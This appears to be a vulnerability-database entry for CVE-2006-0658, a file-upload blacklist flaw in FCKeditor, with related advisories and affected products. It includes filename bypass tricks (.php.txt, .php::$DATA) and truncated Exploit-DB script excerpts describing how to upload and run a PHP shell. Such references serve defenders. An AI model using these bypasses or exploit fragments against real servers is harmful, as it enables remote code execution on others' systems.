CVE-2006-0658
published 2006-02-13CVE-2006-0658: Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute…
PriorityP338medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
6.74%
93.1th percentile
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the Config[DeniedExtensions][File], such as .php.txt.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cardinal_cms_project | cardinal_cms | — | — |
| fckeditor | fckeditor | — | — |
| fckeditor | fckeditor | — | — |
| frederico_caldeira_knabben | fckeditor | — | — |
| redlinesoft | lanai_cms | <= 1.2.16 | — |
| sitex_cms_project | sitex_cms | — | — |
| syntax_cms_project | syntax_cms | <= 1.3 | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:N
osv5.0MEDIUM
vulncheck5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-p57r-mjxp-9www: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-5156 [MEDIUM] GHSA-p57r-mjxp-9www: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
GHSA
GHSA-h3c2-83qf-r2j9: editor/filemanager/upload/php/upload
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-2529 [MEDIUM] GHSA-h3c2-83qf-r2j9: editor/filemanager/upload/php/upload
editor/filemanager/upload/php/upload.php in FCKeditor before 2.3 Beta, when the upload feature is enabled, does not verify the Type parameter, which allows remote attackers to upload arbitrary file types. NOTE: It is not clear whether this is related to CVE-2006-0658.
GHSA
GHSA-g6mx-39hp-44rm: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2007-3163 [MEDIUM] GHSA-g6mx-39hp-44rm: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658.
GHSA
GHSA-mc7h-j7fr-g6h8: Incomplete blacklist vulnerability in connector
ghsa_unreviewed·2022-05-01
CVE-2006-0658 [MEDIUM] GHSA-mc7h-j7fr-g6h8: Incomplete blacklist vulnerability in connector
Incomplete blacklist vulnerability in connector.php in FCKeditor 2.0 and 2.2, as used in products such as RunCMS, allows remote attackers to upload and execute arbitrary script files by giving the files specific extensions that are not listed in the Config[DeniedExtensions][File], such as .php.txt.
OSV
CVE-2007-5156: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
osv·2007-10-01·CVSS 5.0
CVE-2007-5156 [MEDIUM] CVE-2007-5156: Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload
Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
OSV
CVE-2007-3163: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
osv·2007-06-11·CVSS 5.0
CVE-2007-3163 [MEDIUM] CVE-2007-3163: Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2
Incomplete blacklist vulnerability in the filemanager in Frederico Caldeira Knabben FCKeditor 2.4.2 allows remote attackers to upload arbitrary .php files via an alternate data stream syntax, as demonstrated by .php::$DATA filenames, a related issue to CVE-2006-0658.
VulnCheck
FCKeditor before 2.3 Beta editor/filemanager/upload/php/upload.php Arbitrary File Upload
vulncheck·2006·CVSS 5.0
CVE-2006-2529 [MEDIUM] FCKeditor before 2.3 Beta editor/filemanager/upload/php/upload.php Arbitrary File Upload
FCKeditor before 2.3 Beta editor/filemanager/upload/php/upload.php Arbitrary File Upload
editor/filemanager/upload/php/upload.php in FCKeditor before 2.3 Beta, when the upload feature is enabled, does not verify the Type parameter, which allows remote attackers to upload arbitrary file types. NOTE: It is not clear whether this is related to CVE-2006-0658.
Affected: fckeditor fckeditor
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.labs.greynoise.io/grimoire/2024-03-28-panning-for-gold/
No detection rules found.
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload
exploitdb·2006-02-09
CVE-2006-0658 FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload
FCKEditor 2.0 a short explaination: if a user cam call directly
http://[target]/[path]/editor/filemanager/browser/default/connectors/php/connector.php
he can upload malicious contempt on a target server, including arbitrary
php code, and launch commands on it
this works when php connector is enabled in config.php and when, ex.,
in Apache httpd.conf "AddType application/x-httpd-php" directive we have
an extension not specified in FCKEditor Config[DeniedExtensions][File]
array.
However, FCKeditor is integrated in a lot of applications, and if you
succeed to upload the shell (see details in the output of this script)
search for a local inclusion issue inside of them and include the uploaded
file */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 5);
No writeups or analysis indexed.
http://retrogod.altervista.org/fckeditor_22_xpl.htmlhttp://secunia.com/advisories/18767http://www.securityfocus.com/archive/1/424708http://www.vupen.com/english/advisories/2006/0502https://www.exploit-db.com/exploits/3702http://retrogod.altervista.org/fckeditor_22_xpl.htmlhttp://secunia.com/advisories/18767http://www.securityfocus.com/archive/1/424708http://www.vupen.com/english/advisories/2006/0502https://www.exploit-db.com/exploits/3702
2006-02-13
Published